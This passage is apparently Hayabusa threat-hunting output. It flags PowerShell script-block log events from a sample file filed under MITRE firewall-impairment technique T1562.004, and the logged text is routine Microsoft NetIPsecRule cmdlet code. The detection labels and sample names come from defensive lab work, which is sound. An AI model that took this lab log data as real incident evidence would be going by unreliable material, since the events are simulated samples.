[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
